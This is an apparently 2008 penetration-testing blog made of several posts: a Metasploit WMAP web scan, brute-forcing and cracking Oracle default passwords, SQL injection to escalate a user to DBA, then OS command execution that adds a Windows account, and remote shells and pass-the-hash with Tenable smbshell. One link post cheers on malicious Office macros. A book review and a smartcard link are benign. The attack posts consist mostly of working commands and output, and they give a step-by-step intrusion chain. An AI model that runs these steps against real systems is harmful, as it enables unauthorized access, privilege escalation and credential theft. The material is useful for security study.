Monday, November 24, 2008

Metasploit and WMAP


What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:
http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

Step 1: Download, patch, and install ratproxy
http://code.google.com/p/ratproxy/

Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

Step 2: Run ratproxy and browse the site you are targeting, this will populate the database you will use/need for wmap.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db


Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db


Show the targets. This is populated by browsing a site with ratproxy.


msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0
[*] Done.



Select a target and run the print command again to ensure the right target was selected.


msf > wmap_targets -s 1
Host Port SSL

[*] => 1. 192.168.0.100 80

[*] 2. 64.233.187.99 80

[*] Done.


Display the website structure.

msf > wmap_website
[*] Website structure
[*] 192.168.0.100:80 SSL:0
ROOT_TREE
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.



[*] Usage: wmap_run [options]
-h Display this help text

-t Show all matching exploit modules

-e Launch exploits against all matched targets


Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.


Run wmap, go get a (rum &) coke because the bruteforce directory modules are going to take awhile.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
[*] Error: 192.168.0.100
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

---SNIP---

msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display


Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)

1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0

[*] Done.


Show your report.

msf > wmap_reports -s 1
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.


Finish your pwnage...errr pentest.
CG

Sunday, November 23, 2008

Getting your smartcard to work with Ubuntu


The big bummer of Common Access Cards (CAC) is that there hasnt been a real good solution to get it working in Linux. I've seen it done for OS X but not for Linux. Well the guys over at HR Geeks did a writeup on how to get it working, worth a look if you have made the jump to being full-time Linux.

http://www.hrgeeks.com/2008/11/21/using-a-dod-cac-with-ubuntu-and-firefox/
CG

Oracle Pwnage Part 5 -- Password Cracking with JTR


Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...


CG

Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4


Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130

RHOST => 172.16.102.130

msf auxiliary(brute_login) > info


Name: Oracle bruteforcer for known default accounts.

Version: $Revision:$


Provided by:
MC


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 172.16.102.130 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable

SID => unbreakable

msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >
CG

Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video


A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.


Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.
CG

Wednesday, November 19, 2008

Oracle Pwnage Part 3


Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5
CG

Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2


Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO

[*] SCOTT,RESOURCE,NO,YES,NO

[*] Done...

[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/

use auxiliary/sqli/oracle/ctxsys_driload

use auxiliary/sqli/oracle/dbms_export_extension

use auxiliary/sqli/oracle/dbms_metadata

use auxiliary/sqli/oracle/lt_findricset

use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension

msf auxiliary(dbms_export_extension) > info


Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$


Provided by:

MC


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

DBA SCOTT no DB user to elevate to DBA.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST 127.0.0.1 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module will escalate a Oracle DB user to DBA by exploiting an

sql injection bug in the DBMS_EXPORT_EXTENSION package.


msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25

RHOST => 192.168.100.25

msf auxiliary(dbms_export_extension) > set SID
UNLUCKYXDB.MYPWN
SID =>
UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run


[*] Sending package...

[*] Done...

[*] Sending body...

[*] Done...

[*] Sending declare...

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(dbms_export_extension) >


Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT

msf auxiliary(oracle_sql) > run


[*] Sending SQL...
[*] Done...

[*] Auxiliary module execution completed


Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"

SQL => select * from user_role_privs

msf auxiliary(oracle_sql) > run


[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO

[*] SCOTT,DBA,NO,YES,NO

[*] SCOTT,JAVASYSPRIV,NO,YES,NO
<-- Yup it worked :-)
[*] SCOTT,RESOURCE,NO,YES,NO

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_sql) >


From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info


Name: Execute win32 OS commands
Version: $Revision:$


Provided by:

MC


Basic options:

Name Current Setting Required Description

---- ------------- -------- -----------

CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST 127.0.0.1 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"

CMD => net user dba P@ssW0rd1234 /add

msf auxiliary(oracle_win32) > set SID
UNLUCKYXDB.MYPWN
SID =>
UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25

RHOST => 192.168.100.25

msf auxiliary(oracle_win32) > run


[*] Creating MSF JAVA class...

[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'

[*] Done...

[*] Auxiliary module execution completed


or you can test you are executing commands with ping

msf auxiliary(oracle_win32) > set CMD "ping 192.168.100.50"
CMD => ping 192.168.100.50

msf auxiliary(oracle_win32) > run


[*] Creating MSF JAVA class...
[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'ping 192.168.100.50'

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_win32) >


on the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40

01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40

---SNIP---


8 packets captured
8 packets received by filter

0 packets dropped by kernel


For the ninja shit, check out MC's demo text file.

**Issues, you cant see the output of your command, so you have to run stuff that you can see the results of, see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module

"revoke dba from scott"
"revoke javaprivs from scott"

That's it!
CG

Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1


Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here: http://metasploit.com/users/mc/

We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run

[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 - Production


Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >


Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.


msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed


WTF! no FTW on that one. A Google of the error oracle 12514, hints at the Oracle instance not being set up correctly. Lets see if we can get some more info. Using tnscmd.pl (oldie but a goodie) lets see if we get some additional information using the status command:

cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,.........@



Let's try it with the service name; UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
[*] PL/SQL Release 9.2.0.1.0 - Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
[*] NLSRTL Version 9.2.0.1.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


**Yeah it worked. Now its time to get some more useful info

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed


Thats it for part 1, part 2 we'll use some sqli to hopefully bump scott up to DBA and execute some OS commands.

CG

Saturday, November 15, 2008

Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review


Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review
by Hal Abelson, Ken Ledeen, Harry Lewis

4 stars

Witty (Hopefully) Amazon Title: My bits are gone and I want them back!

The authors of Blow to Bits: Your Life, Liberty, and Happiness After the Digital Explosion cover both new and old technologies and how they relate to todays cultural and political climates. Driving home the history of most of the technologies we can't live without and their tumultuous relationship with the legislative and judicial branches of the American government.

Breakdown of the chapters:

Chapter 1: Digital Explosion: Why Is It Happening, and What Is at Stake? 1

Chapter 2: Naked in the Sunlight: Privacy Lost, Privacy Abandoned 19

Chapter 3: Ghosts in the Machine: Secrets and Surprises of Electronic Documents 73

Chapter 4: Needles in the Haystack: Google and Other Brokers in the Bits Bazaar 109

Chapter 5: Secret Bits: How Codes Became Unbreakable 161

Chapter 6: Balance Toppled: Who Owns the Bits? 195

Chapter 7: You Can’t Say That on the Internet: Guarding the Frontiers of Digital Expression 229

Chapter 8: Bits in the Air: Old Metaphors, New Technologies, and Free Speech 259

Conclusion: After the Explosion 295


All the chapters were well written, informative and flow well together. I felt the authors did a great job breaking down the technical concepts behind the technologies well enough to get the required background (technical but not too technical) and then move into the political discussions of those technologies. The real value of the book was the "Your Life, Liberty, and Happiness" portion of the discussions. They discuss how has the world changed now that we are moving away from paper and everything is in bits. Who owns those bits, what is the government and industry allowed to do with those bits and what about privacy in our lives now that very detailed profiles of people can be generated from those bits (especially since we gave that information away for a few cents off at the register or for some "free service")?


There are plenty of books that discuss the 1's and 0's of the concepts but few I have read that talk about the privacy, governmental or cultural issues that arise from those technologies. Like one of the other reviewers(1) mentioned, plenty of "geez whiz" moments along with plenty of other "I cant believe they did that" moments as well. A great read.




CG

Friday, November 14, 2008

Link: Writing malicious maros using metasploit


Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

http://blogs.securiteam.com/index.php/archives/1161

of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.
CG

Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell


Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :
  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host
http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

oh and shell, shell is fun

shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
